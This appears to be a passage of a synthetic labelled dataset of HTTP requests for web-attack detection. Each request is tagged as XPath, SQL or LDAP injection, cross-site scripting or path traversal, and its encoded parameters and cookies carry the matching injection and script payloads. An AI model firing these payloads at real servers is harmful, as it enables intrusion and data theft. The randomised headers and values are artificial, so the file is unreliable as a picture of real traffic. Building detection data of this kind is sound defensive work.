Expect: rhfh=eehOa
From: ilnif2nt@oaeecsl0c.fr
If-Modified-Since: Thu, 25 Sep 08 08:47:08 CET
If-Unmodified-Since: Mon, 07 Feb 05 13:33:57 GMT
If-Match: "x3QJjPFzWPMPqM6"
If-None-Match: "-bmD-nikH6O2@7f"
If-Range: "JNk7LRhRVFw-x1Xg89xU"
Max-Forwards: 1218
Pragma: no-cache
Proxy-Authorization: 0uodl1 2odeShn4=r2hpv
Authorization: Basic b2YyaWRvZjpoNHpkcmRo
Range: -024
Referer: /39rnnyq/c2oqh/Lanc9g.sh
TE: deflate,deflate,trailers
User-Agent: Mozilla/7.5 (X11; U; SunOS sun4u 3.8; an-gw; rv:5.8.9) Gecko/54861352
UA-CPU: 68000
UA-Disp: 2376,908,8
UA-OS: Windows 98
Via: alu/3.6 www.a2oeesn.tiff, 6.1 www.etiIt.jpg, 8.6 56.53.254.221
Transfer-Encoding: compress
Warning: 317 5.218.126.84:2 "bdhuhPeStawrDs" 
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41154
Start - Id: 49646
class: XPathInjection
GET /dL/hrthidHPtMibJoee/4as/Em@cpsystemsNtelnetlMftpp/idrpytiotlenih/1uuDTLn68i_qLBIkGcqH.jpg?hjiwt=uSp_9K_8&K6I0BHpmail=hetzvdcocnr5fvas&mieeeqiene=m4a+&AgnooEQwRta=scriptd&96i=hnht&m7wodyiacgafOs=6020235470&6yZJprocessing-instructionJ=5736&jevNXwmoeR=nwnana%27+++++or+++mcaolg%2Fgtetn%2Fchild%3A%3Anode%28%29%5Bprocessing-instruction%28%29%3D215%5D++++or++%27sge%27+++%3D+%27&sopt97emf=572122&r1tlTya3NheXV=heS&armcui8=ornpo&ithfnrniN=0059 HTTP/1.1
Host: www.sndossHttC.org
Connection: ohrM
Accept: */*;q=0.1
Accept-Charset: *;q=0.3
Accept-Encoding: gzip, deflate;q=0.3
Accept-Language: *;q=0.4
Cache-Control: no-transform
Client-ip: 18.132.255.142
Cookie: 8FlI=217600;stik0h50ohonl=yooonMkdVa;tua=8
Date: Wed, 07 May 08 09:25:20 UTC
ETag: W/"x5D.7cgcr.pcjg39"
From: rl5Ut9Om@ezgu03ute.cz
If-Modified-Since: Mon, 10 Jul 06 02:16:17 UTC
If-Unmodified-Since: Sun, 26 Sep 04 07:25:34 UTC
If-Match: "z1epBmyufILgw7LQ"
If-None-Match: "y@gyu40UFW2RU@gHub"
If-Range: Tue, 03 May 05 11:09:00 CET
Max-Forwards: 5921
MIME-Version: 7.8
Pragma: toS=teenfHn
Proxy-Authorization: NTLM ZXR4Y2FuZmVyZ2lzdUVlbnRzYUJIZWdqWmhua2VwZTFlZXNt
Authorization: aieon agLsomy=lader
Referer: http://www.uret.de/tacu.php
TE: trailers,gzip;q=0.6
User-Agent: mnms/9.8
Via: dvno/1.0 86.196.236.183:4835, 7.5 www.lFfj2wd.gif:95150, 1.7 www.xocUi.html
Transfer-Encoding: identity
Upgrade: d5det/1.1
X-Forwarded-For: 163.247.165.107
X-Serial-Number: 6227960024150
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49646
Start - Id: 48854
class: XPathInjection
GET /hidl.png?h.GxB-lzoB=nelrieuLhs&thtiie=eCU4RJif5&rn=515277&ano=sUYI5e7w&lgho3=ior&UQ@Idrdiv=ge6-aAVXG&74accept5=48620628&sot9bwvr6s77y=81239&anp61doxroha=auetfu%27%5D+++++%7C+++P+++++%7C++%2F%2Fuser%5B++name%2Ftext%28%29++++%3D%27nmtde&ypy=nmAni1&tnrvronwe38ed8=Nd&hnaaohtnttT=7owoLhaashHN HTTP/1.1
Host: www.detQThe.uk
Connection: close
Accept: */*;q=0.3
Accept-Charset: *
Accept-Encoding: *
Accept-Language: idoswh-dtian, t1vac-d, NnacEIhd-rcok;q=0.4
Cache-Control: no-cache
Client-ip: 250.77.251.179
Cookie: @vbscriptKmocha6abgsoundd=ltDibesngldst4tg8;teeo1=y E8McthiTgconnectpassthrun;ebskfiimtl0he=i7iX-Zdui_JL;nsduy68a=a7>Oaotmetaualhe;XB6U6PVEvl0=st9nsaii
Cookie2: $Version="97"
Date: Thu, 20 Aug 09 07:08:20 GMT
ETag: W/"VjMVqrT41@mFChvd"
Expect: akafu79
From: cSenj7od@i5ssuRhni.com
If-Modified-Since: Wed, 10 Nov 04 17:17:37 UTC
If-Unmodified-Since: Mon, 09 Apr 07 08:37:48 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 9
MIME-Version: 4.5
Pragma: no-cache
Proxy-Authorization: NTLM a05vZXJvNWU1aHRyaGFzM21hblBscHNuZWliMmh0RXRp
Authorization: ehCv8c ntaa=tnysa
Range: 845-,90670-12915,351536-
Referer: /daol5A/p128/loaterlx/Nded/adfoCam.htm
TE: chunked,chunked;q=0.5
Trailer: Accept-Charset
User-Agent: FhEtYirlIqmh
UA-CPU: MIPS
UA-Disp: 184,1119,16
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 842x5954
Via: 3.3 www.k8eekecS.shtml:61, FTP/8.6 193.19.0.134, tao/8.4 www.tilfqe5i.htm
Transfer-Encoding: aqihss
Upgrade: Anfn/8.5, ere/1.4, 8ssixi/3.7, oAe/9.3, enwsi/1.1
Warning: 687 108.217.115.97 "lnedeee" 
X-Forwarded-For: 239.247.179.124
X-Serial-Number: 177199337529573688
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48854
Start - Id: 41575
class: SqlInjection
GET /d1vMFVWWKdl/lNL@6ievz/dn2Op4fnhClABtQH/-FapasswdKB0axtermzJ/raistgeet5onoa1evtm/0.V-7lRonO/oohsatR7ne13rfnI/iRB7u3wA6cM_9w/znv7GsPkjPjd/i.N.humoPHwD.png?knrw=171065&riteiN=nBGUMdx%40NY&eid=414&7uallm6GW17Qe=47&na=6&jauEehurieenh=4&4ZH7S=8eeznth%29rpara8l&UZbO.7QIUh=OR++%27arb5%27++++%3D+++N%27+++%27&t4torsonne=woe+Chrst&rnlintdo9=ithavingtnkD HTTP/1.1
Host: www.rd7sNniegl.it:80
Connection: close
Accept: audio/*
Accept-Charset: *
Accept-Encoding: *;q=0.2
Accept-Language: srtZihl-na, 5-auweonee, tniiF5-tmeln
Cache-Control: no-store
Client-ip: 237.68.176.239
Cookie: hStT5g=jY2J1;Oethrashnawo=i-nadminsswiframeeaallsnfk;tj3ucsdrleedd=erri;yu@LK2Zn.40G=3qC0V6n7js;systemZeY=n krntn;tbtea=d549@CUi4
Cookie2: $Version="8"
Date: Fri, 25 Jan 08 21:27:55 CET
ETag: "BSZ0DEttcU_5_LcM"
Expect: lelwnt
From: xwfji@6eera.be
If-Modified-Since: Sat, 30 Aug 08 10:49:26 UTC
If-Unmodified-Since: Fri, 02 Oct 09 06:03:52 UTC
If-Match: "89qyYq7ag@mcdLk9Mw"
If-None-Match: "hWceBVZBcyHem7PY4"
If-Range: Sat, 18 Oct 08 10:39:41 UTC
Max-Forwards: 98
MIME-Version: 3.1
Pragma: 1fcgiy='riss'
Proxy-Authorization: NTLM b2xzb3NobDl0dG9mbWpvZTJmc2VmczJlZWhlZm10cWV0aHN1bGNvNmliZDg=
Authorization: ytkd2f r9ns9e=yODl
Range: 629953-,-3
Referer: http://www.fdnetenn.cz/7bs1/sCtrs6m/lhlnsame/curm.jsp
TE: trailers,trailers,trailers
Trailer: If-Range
User-Agent: tpDnu@ http://www.3gg6.org
UA-CPU: StrongARM
UA-Disp: 989,4955,16
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 1852x515
Via: HTTP/2.9 www.uwip.gif, 3.0 169.72.154.142:51532, 0.2 42.201.7.214:312
Transfer-Encoding: deflate
Upgrade: Epoll/4.7, sesde/6.4, Uar/2.7, i4she/5.4, mukl/7.2
Warning: 480 www.mfahnai.css "oldac4" "Mon, 15 Jun 09 01:00:23 UTC"
X-Forwarded-For: 166.15.230.232
X-Serial-Number: 27867012215439
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41575
Start - Id: 49524
class: XPathInjection
GET /eMn.gif?1orusrWg=691&ychurel7iw9n=eonlcal%27++or+++++count%28+path%2Fchild%3A%3Anode%28%29%5Bposition%28++++%29%3D%28%28++i%2B+++j%2B++k%2B++++l++%2B+++1%29%5D++++%7C+path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1+++++or+%27notu%27%3D++++%27+++++rt%27+or&gsystembinQWnetcatu3=bdCTaW2Ek&Mtore=r5a0Egn&enn9atym=24925&eny=Weshleekin0aIm3es&ouolpzmrh4eqcme=432&8idhfosedsb=E+%5Cea3irof&8i3oss=26211&odrupdEEoer1=re&wcItSl9eSdErT=nodrte&sootheh=+%7C%7Cwindow.open-rs+bnalhutees HTTP/1.1
Host: 221.213.124.226:80
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-roman, iso-8859-6;q=0.7, iso-8859-8-i
Accept-Encoding: 
Accept-Language: *;q=0.3
Cache-Control: max-stale
Client-ip: 91.134.19.242
Cookie: em8i3ylhit=mS_qLb;e5=19
Cookie2: $Version="709"
Date: Fri, 03 Aug 07 18:39:59 CET
ETag: "pUBVRGni3kIAQ_BM_qDc"
Expect: Set5qe
From: jwtneu@uosy.be
If-Modified-Since: Sun, 12 Apr 09 20:51:59 UTC
If-Unmodified-Since: Sun, 22 Feb 04 16:19:12 GMT
If-Match: "WIO@SN6pQdEIb0fNX"
If-None-Match: *
If-Range: *
Max-Forwards: 7
MIME-Version: 4.3
Pragma: rsoeut='5at'
Proxy-Authorization: ao6tbr qsmelsdm=S7mcd8of
Authorization: Digest nc=81065811
Range: 72-,357-,72130-42
Referer: http://HrpryEi.it/wahTEt/6nuio.jpg
TE: deflate;q=0.5
Trailer: Trailer
User-Agent: dsOFQUHiBR http://www.anoltrg4.ch
UA-CPU: Sparc
UA-Disp: 2924,8513,8
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 5470x3164
Via: FTP/9.8 1.93.204.175
Transfer-Encoding: eetfro
Upgrade: 2ao/4.8
Warning: 159 80.118.128.49 "egeLeoxihuinfidnnn3" "Fri, 16 May 08 05:37:47 CET"
X-Forwarded-For: 224.66.157.216
X-Serial-Number: 4596241823364339
----: --------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 49524
Start - Id: 45092
class: PathTransversal
GET /.nsf/../notes.ini? HTTP/1.0
Host: 46.210.2.109
Connection: close
Accept: */*
Accept-Charset: windows-1258, x-mac-hebrew, iso-8859-15, cp-950, iso-8859-9;q=0.2
Accept-Encoding: *
Accept-Language: Aea5-trhst;q=0.4, en-8tnn
Cache-Control: only-if-cached
Client-ip: 217.208.54.150
Cookie: 6fofT3ben=gqQo1;ea1smudacAs=rmOwTnha3dt 
Cookie2: $Version="39"
Date: Thu, 28 Jan 10 02:18:15 GMT
ETag: W/"7WmXr8y3aSdi1ba"
Expect: 100-continue
From: eiohqll@iTFpeegw.net
If-Modified-Since: Wed, 30 Nov 05 11:41:10 CET
If-Unmodified-Since: Wed, 12 Nov 08 05:44:50 GMT
If-Match: "cQXjZG9mFvRWGh1atz"
If-None-Match: "gAja489I21QsH_zgF6bm"
If-Range: Sun, 11 Mar 07 04:04:23 CET
Max-Forwards: 841
MIME-Version: 2.7
Pragma: ly4z='pj'
Proxy-Authorization: Digest cnonce="lEha"
Authorization: 3alr nhne=d3AAei
Range: 61-,599945-,96-
Referer: http://rjdc8tle.com/arerih/o3ay/smhwgnt/feoeeb/IY7annnm.png
TE: trailers,deflate;q=0.3,trailers
Trailer: Connection
User-Agent: sad2/7.3.2.1.0
UA-CPU: StrongARM
UA-Disp: 0628,6146,8
UA-OS: Win98
UA-Color: color8
UA-Pixels: 213x015
Via: 2.1 www.nmIjfen.jpg, 6.3 54.170.128.53
Transfer-Encoding: gzip
Upgrade: ttpNf/8.4
Warning: 131 165.136.34.196 "tchbajdsaa" "Fri, 12 Mar 10 18:52:44 CET"
X-Forwarded-For: 211.43.232.104
X-Serial-Number: 072717739908408335
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45092
Start - Id: 50097
class: XPathInjection
PUT /nrhSQO2U/hNltildBws/oSAxHReuvvzzK/rdixaiIe/yo.jpeg? HTTP/1.0
Content-Length: 291
Content-Language: lvP
Content-Encoding: compress
Content-Location: http://ioesss.it/diit/baqneEi/usNdeJ1/1se58.mpeg
Content-MD5: bHRpNnMzdVRjZXJlSXNobA==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 26 Jan 07 12:45:52 GMT
Host: www.wctiioldn.org:80
Connection: close
Accept: text/*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: min-fresh=60
Cookie: natr12je=28 or  1<     dYharm/tiaece/ps5/child::text()[position()=35]   or   100='] | /* | /foo[bar=';7IX1nph-VBDG5v=ns utdolEfd
Cookie2: $Version="419"
Date: Wed, 09 Nov 05 07:01:14 CET
ETag: W/"oVGxOXRSDXIVS2DmUS"
Expect: 100-continue
If-Modified-Since: Tue, 19 Jan 10 13:10:38 GMT
If-Unmodified-Since: Wed, 12 Oct 05 01:41:59 GMT
If-Match: "RHcOKMBkKey-25rLYfC"
If-None-Match: *
If-Range: Mon, 07 Jun 04 05:40:07 GMT
Max-Forwards: 4644
MIME-Version: 0.8
Pragma: ntI='dtouc2y'
Proxy-Authorization: suTl 8f8j=vedKtm49
Authorization: Basic VHBzOXU6YXRyc2lDQ3I=
Referer: /ur3s/jterzea/tIyte/heuetisa/qtnme.txt
Trailer: Range
User-Agent: Mozilla/6.8 (X11; U; Solaris 7.5; et-eo; rv:1.2.9) Gecko/68685622
UA-Color: color16
Via: 2.3 168.203.0.55, 5.9 www.5feT3w7.htm, vueeis/7.1 219.190.115.38
Transfer-Encoding: gzip
Upgrade: tnneIh/3.3, sWf/3.2, dt7pet/7.2, mAzn/5.8
Warning: 896 106.250.253.174:22645 "rcMtty2tHhte5thfEiSt" "Thu, 13 May 04 23:52:35 UTC"
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Tgwivv93sqagoG= a@tnvUlyn u~|/t&e&nvvcico2secnJ=eDtog]slte&usntaiaB=ierehe9w&a1oitocaib=0955089&eniimrarak= t&atfisi=ruYxxRSbhlfs&ryOuo=xgx9hb6Hmy&sgieso=654424&d3entbAV163D=)roxs&C9harr=T$xdivklntatitltE&cmNyi=yiCnqogui&itu59g=6&Jdscriptperl.WHexecByo=946469847&_pLjM=n|ss

End - Id: 50097
Start - Id: 38370
class: LdapInjection
GET /rI2YfwOO/oLhaas9/rcentElthetaecewme/exi6Z4HcQiAt7nsr/oIgEimDuH@uS4chj/b8f5IJJfvxVjT/rF6sSysystemOSU@/fHRpuTcbZA3d/fp0I7o_-hsoFtKwZ4fqs/68n/eThmt0glhglutsbrch/nitI4.asmx?v8kWJv7or=Ws&ntdansetioubjgp=531&htnsbohAsits4=hi.eZHrhio&gadaevidhwNia=%29++%28++%7C+++%28displayName%3Dhad*%29+++%28name%3D+++had*++%29%28mail%3Dhad*%29&cmeR=+t%25e HTTP/1.1
Host: www.aqi2ra0.org:3405
Connection: ealidg
Accept: text/*;q=0.5, application/postscript, text/*
Accept-Charset: *;q=0.7
Accept-Encoding: deflate, identity;q=0.2, deflate
Accept-Language: *
Cache-Control: min-fresh=43
Client-ip: 152.74.253.224
Cookie: tdy4jsahtoaA5lp=14;VBXwQRUgK=5aL4MLnlx3x-;cnojah=?uaa0zrs \hnexo
Cookie2: $Version="9"
Date: Thu, 21 Apr 05 18:45:03 UTC
ETag: W/"Axy7yjo7C24zv2Icb-5w"
Expect: 100-continue
From: frlm@ctsi1ez.ch
If-Modified-Since: Sat, 03 May 08 12:10:07 UTC
If-Unmodified-Since: Sun, 10 Oct 04 03:32:19 UTC
If-Match: "d3QqBsEjQtALlk0wU"
If-None-Match: *
If-Range: Wed, 24 Nov 04 12:17:25 CET
Max-Forwards: 4
MIME-Version: 8.9
Pragma: no-cache
Proxy-Authorization: Basic dGlkaVI6ZDllUnJhcg==
Authorization: Basic anNjcnQ3Ym46d2V1YTlhd24=
Range: -0,582766-
Referer: /tuFt.tiff
TE: chunked
Trailer: Referer
User-Agent: Mozilla/4.6 (compatible; MSIE 2.7; Mac OS X; poytTao)
UA-CPU: 68000
UA-Disp: 8585,869,8
UA-OS: Win98
UA-Color: color8
UA-Pixels: 6897x261
Via: 6.1 www.tsBshuqe.htm:7946
Transfer-Encoding: compress
Upgrade: o1jc/2.3, igt/0.7, Hce/5.3, re9/4.3
Warning: 625 www.tiqr.shtml "a8aoszhaq" 
X-Forwarded-For: 132.120.163.64
X-Serial-Number: 9579642646846
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38370
Start - Id: 50056
class: XPathInjection
PUT /deqennhskaeeycavlOu/e8Z8nimurrseaonAAt/lQN0KbIy/oX/et@pPIiuDWO138IjLZ/4c6G1iug95MFYNMwUdE/ontagtEsfaasOaecQa/e5blsTad4f/nOvCYDgEWz3/-insertssmdq0WqPf@Ha/424mtesnvursnnu.exe? HTTP/1.0
Content-Length: 55
Content-Language: lejsirnh
Content-Encoding: compress
Content-Location: /Itoe6a/c80sexoi.nsf
Content-MD5: MG9oenBlc2VocEV0cmthaQ==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 25 Feb 09 12:23:23 CET
Last-Modified: Fri, 15 Jan 10 09:55:53 UTC
Host: 189.187.14.252
Connection: close
Accept: application/*;q=0.4, text/*, video/quicktime
Accept-Charset: cp-936
Accept-Encoding: 
Accept-Language: mttes-3, aei-xn, uolIgv-w;q=0.9, ht-in4b
Cache-Control: max-stale
Client-ip: 151.160.193.118
Cookie: mweshoyuer=onam/Ror/h/child::node()[position()=35] or 'np'='
Cookie2: $Version="46"
Date: Thu, 18 Nov 04 15:21:05 UTC
ETag: W/"5ZciEA7Hd10LezzU"
Expect: lnIel
From: tndo@hOino.uk
If-Modified-Since: Tue, 18 Mar 08 24:46:57 GMT
If-Unmodified-Since: Sun, 29 Jul 07 19:04:32 GMT
If-Match: "vwrzA5NNwD1R4hlz0G3"
If-None-Match: "SKZ0XwpWJ-igJN5@rFa"
If-Range: *
Max-Forwards: 06
MIME-Version: 1.9
Pragma: cmeiujcd=mouod
Proxy-Authorization: Digest uri=http://eeL9o.uk/imdA7.php4
Authorization: NTLM YWZlb3V1a2hlZ3MzcGh0bmNvdGhRNnRzaHNlZG91dG8=
Range: 52839-,942-53,-81200
Referer: /9eiy0cwa.conf
TE: chunked;q=0.4,trailers
Trailer: If-Modified-Since
User-Agent: h4aveiken
UA-CPU: MIPS
UA-Disp: 086,0919,32
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 3705x532
Via: 2.9 35.109.160.194, FTP/1.7 251.243.255.32:3, FTP/4.9 174.118.184.59:628
Transfer-Encoding: compress
Upgrade: seeim/7.5, eeEad/9.1, noaakN/7.4, uat/4.4, Shme/3.3
Warning: 633 118.107.47.29 "ehmrqron" "Sun, 16 Apr 06 02:34:14 GMT"
X-Forwarded-For: 78.250.5.71
X-Serial-Number: 34243313236496
----: ---------------------------
~~~~~: ~~~~~~~~~~~

imyxme6n=rd@&pctton4rshotsn=9tN&OfhttpsH= n8m3Enr8lNe

End - Id: 50056
Start - Id: 48050
class: XSS
GET /4NoylynThOadwhtexu/HGvUc-NrI16zmail/otyw973.jpg?wl8ikN=%25aea&BBpAXueQstylehtacces=eeVGI&gO38eh6cr8ehr=h0xURmA&8vktwururhle=7ooreatcmre&eHraana7ctee=ocoxRDZ_&wto=rnlnDaanaadh&tte3ae=p1Hot2Lu&mewsHwnzer=1YI4RuK-&dhenlis9sz1=oss&EtoeOataen=28&ibe=%3Cimg++src+++%3D%22+++++javascript%3A++%5Balert+%28%27aee%27%29%3B%5D%22+%3E&sa8etnasmCsz=hr+naknph-e HTTP/1.0
Host: 25.90.227.125
Connection: aghqe
Accept: text/html;q=0.5, image/*, text/xml;q=0.2
Accept-Charset: iso-10646-ucs-2
Accept-Encoding: deflate;q=0.5, compress, compress
Accept-Language: dmae-n
Cache-Control: only-if-cached
Client-ip: 252.198.126.142
Cookie: sleiecTm3d=2015722541;raiia=teiteoa;tgtutls=mpBNpohavctsos
Cookie2: $Version="1"
Date: Fri, 06 Jul 07 07:12:35 CET
ETag: "L_-wg1nSAVO_G5W.OjZ4"
Expect: anmte=7mtotl;taCmh=mwueaUo
From: agsv@hn76ev.st
If-Modified-Since: Fri, 17 Nov 06 12:40:11 CET
If-Unmodified-Since: Fri, 29 Aug 08 05:57:08 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 6922
MIME-Version: 4.3
Pragma: no-cache
Proxy-Authorization: jae8sr 0tnaix=eudc
Authorization: Digest opaque="sacin"
Range: 16-601
Referer: /m3oihlF/aSrir3ri.tiff
TE: trailers
Trailer: Accept-Charset
User-Agent: Mozilla/4.5 (Windows; U; WinNT 7.6; hn-uf; rv:6.2.4) Gecko/27834681
UA-CPU: StrongARM
UA-Disp: 0372,351,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 6389x0168
Via: 1.0 www.wreqh.htm, FTP/7.4 www.dj80.js
Transfer-Encoding: identity
Upgrade: ohr/0.8, dird/9.6, ccspda/7.4, eaonS/0.7, xbT1yr/6.0
Warning: 931 43.142.35.211 "tUI3qeeCt" "Mon, 16 Feb 04 11:58:32 CET"
X-Forwarded-For: 188.45.251.30
X-Serial-Number: 405569074263988888
----: -----------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 48050
Start - Id: 47717
class: XSS
GET /GfdAmeta/gU3dLeShJrGcGyh/s9n-B3fuuuh.NSH9YD8/yMSoL40/mltesa4cU58/ddyedtl6s/eihses7eestizca/oJ3fIr9yGZS_6/yTrU3J@kj2BVXEDK/m7f9Jz4Ih.mdb?m.Ed1@J4Ag=2586273045&6ol=910881851&wrcuwx8n=%26%3Cscript+++%3E%5Balert+++%28%27cttrs9%27%29%3B%5D%3C%2Fscript+++%3E&0hAst0lInw=cfromehm&vnennkoyr=idrheecolye9&rub8efthnewtir=e%25hRi&mtuEtml8pbptE8s=Lldhr+locationlikebodyCr&l4o6otsnstsos=dYabQ&leobnenlzhmvdSn=20548264&R8.sock_streamA=eroW&Ie7l9L=6glikenlor%7Ccnr+nndxm&nwewlatd=6905532127&ennaa1ebes2s=rO&9divZZPuC=tastyle%3Cmlinkt2op&smlileWejoc=imqo+ HTTP/1.0
Host: www.s1ta.cz
Connection: close
Accept: */*;q=0.1
Accept-Charset: cp-950, x-mac-icelandic, x-mac-turkish;q=0.9
Accept-Encoding: compress, gzip;q=0.0, gzip, identity, identity
Accept-Language: *
Cache-Control: min-fresh=7180
Client-ip: 245.204.137.49
Cookie: HeeamatrenbnE=659
Cookie2: $Version="6"
Date: Fri, 07 Oct 05 24:22:05 GMT
ETag: "o8srXj_tTzX-96_kyD"
Expect: 100-continue
From: Nhksen@i9nwketoNw.gov
If-Modified-Since: Tue, 02 Nov 04 09:16:53 CET
If-Unmodified-Since: Mon, 13 Dec 04 11:24:05 GMT
If-Match: "BYTrcd.j4UI.-dy"
If-None-Match: "gzKqJlOfF.bFpsguW."
If-Range: Mon, 17 May 04 01:21:28 CET
Max-Forwards: 415
MIME-Version: 1.4
Pragma: DLjs='tiI'
Proxy-Authorization: Digest realm
Authorization: NTLM ZWRlZ2tidHJjbTlzbXNkNU50ZTNJNG9zaXdudGV1ZWFuaTdF
Range: 2174-,56-,-57382
Referer: /ruihotx/iseomt.tar
TE: chunked;q=0.6
Trailer: Date
User-Agent: yraaots/9.1.7.9.7
UA-CPU: 68000
UA-Disp: 2301,334,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 5167x472
Via: 6.0 www.gem9.js, 4.9 68.33.210.1:260, djl/9.9 www.m5ord1.html
Transfer-Encoding: deflate
Upgrade: dkl9/3.1, Y30iPN/9.5, ieat/6.0, mjwRi/1.0
Warning: 328 www.rri2Tey0.htm "ndrOro" "Wed, 18 Nov 09 04:33:59 UTC"
X-Forwarded-For: 218.241.223.131
X-Serial-Number: 89188723783
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47717
Start - Id: 37040
class: LdapInjection
GET /Odnmdmnnclrenyauhceg/tueU1Hdr/ta4rZ6/i-Tuc7PhNlGXdWc.css?htNmtnR0as=idi&oyslqs=%29+%28%7C+%28displayName%3Dhad*%29+%28name+%3D+++had*++%29%28+mail%3Dhad*++++%29&tntaewotfy=rWf HTTP/1.0
Host: www.ma3dtl.be
Connection: close
Accept: */*;q=0.4
Accept-Charset: *
Accept-Encoding: *;q=0.4
Accept-Language: *
Cache-Control: min-fresh=7343
Client-ip: 135.75.52.142
Cookie: EiyrcoyR4hgnEd=svMI18MYpqg-;sUZ9KMaO=742;w.g@g._Seqs9=2066097;Dzei3cbetiOi=lmqnelnbr;1m7heooy=seaomh0og
Cookie2: $Version="6"
Date: Sat, 27 Sep 08 22:08:10 UTC
ETag: "Nwi0NjG_4ak-fCi9N.eQ"
Expect: kodtt
From: tJpe@htd4aess.biz
If-Modified-Since: Sun, 23 May 04 17:59:34 CET
If-Unmodified-Since: Tue, 09 Dec 08 04:53:48 UTC
If-Match: "EgR4YxrJCnzzR-vb"
If-None-Match: "xA.HK8rw-qF53ktNCer"
If-Range: Wed, 31 May 06 13:46:46 CET
Max-Forwards: 602
MIME-Version: 5.5
Pragma: Di=h
Proxy-Authorization: Digest opaque="isetlaxp"
Authorization: Digest cnonce="REnaYh"
Range: -742236,5-8909,-634
Referer: http://www.6yyia.fr/5Oua7hjh/gqeta.php4
TE: chunked,deflate
Trailer: Date
User-Agent: nlawl8gs/5.0
UA-CPU: MIPS
UA-Disp: 370,042,32
UA-OS: Win98
UA-Color: color16
UA-Pixels: 9902x0663
Via: 2.1 201.140.223.201:942
Transfer-Encoding: h4e2Oh; zotoikeu=rAgrxl
Upgrade: nopuat/4.5
Warning: 659 www.4uoi.png "b04aynrye3u6tsecce" "Thu, 21 Jul 05 09:43:39 GMT"
X-Forwarded-For: 164.143.217.25
X-Serial-Number: 4092233930
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37040
Start - Id: 37948
class: LdapInjection
GET /telnetuMcIzn/aOarDti/oQwhereR0Pv/esxTEI1fC9r54/4SNtQconnectIlZblvarA-/k@RryeS.IrW_yu/w6eiff4arxoeisrtdur/P9oB/CupdateIG4WC/tsftCetfitnc5.gif?we=6&3ngdTett=d2tWNS6._3e&ireo=ssWB-a_Jie2b&tsrtede=u1hRT9Xo8Y1&sgOotdli=+o&mox=Eiar&NornyHT5va=iitdeor8eor&e1tinua=03498718&iahEoeto=6&emw3qY2traa=o+tlsi0%3B%3EleG%3Dt+&tsBshyjv=sl5heep%2Fvs+Joulapeprocessing-instructione&oLjeLomzsedutiO=muobogl&QnVKx8unwd=%29++%28++++%7C+%28w7oo%3Dhdr*%29&2Ewox=6aec%40&0phrif5nmolhi8c=e%3EsP HTTP/1.1
Host: 125.149.57.75
Connection: keep-alive
Accept: audio/*, text/*;q=0.6, text/*;q=0.5
Accept-Charset: *
Accept-Encoding: *
Accept-Language: cml-Reeiopo;q=0.5, irA9jtl-al;q=0.2
Cache-Control: no-store
Client-ip: 105.100.209.65
Cookie: sexaxC7bt=dA Tc;hOetqew=174164
Cookie2: $Version="2"
Date: Mon, 15 Jan 07 12:43:37 UTC
ETag: "aUGFuRHW-zMYOvq2nU"
Expect: 100-continue
From: p2udarel@zentnnsmu.org
If-Modified-Since: Fri, 01 Apr 05 17:43:18 UTC
If-Unmodified-Since: Tue, 30 Dec 08 20:19:26 UTC
If-Match: *
If-None-Match: "50JG9_b25xdD8wTN2U"
If-Range: "Rac18572haXkQj6nt-hB"
Max-Forwards: 7641
MIME-Version: 0.6
Pragma: eptnNn=r
Proxy-Authorization: Digest username="toobo"
Authorization: Digest uri=/jrs8/tehhzt/heNhe.bin
Range: 648492-,076146-138301,-5163
Referer: http://www.ehor.biz/Lapegtl/xirsso/thhreoie.msf
TE: chunked,deflate,gzip;q=0.2
Trailer: If-Range
User-Agent: Mozilla/7.0 (Windows; U; Win98 9.8; sa-ss; rv:9.4.2) Gecko/38918347
UA-CPU: Sparc
UA-Disp: 472,2226,8
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 8848x2681
Via: 4.9 125.58.4.176, gfto8/9.7 118.243.94.23
Transfer-Encoding: deflate
Upgrade: spoM3/2.4, sus/6.4, cez/4.2
Warning: 209 www.aRtos.png "mgfiafudiih" 
X-Forwarded-For: 143.12.94.194
X-Serial-Number: 8812591
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37948
Start - Id: 35799
class: XPathInjection
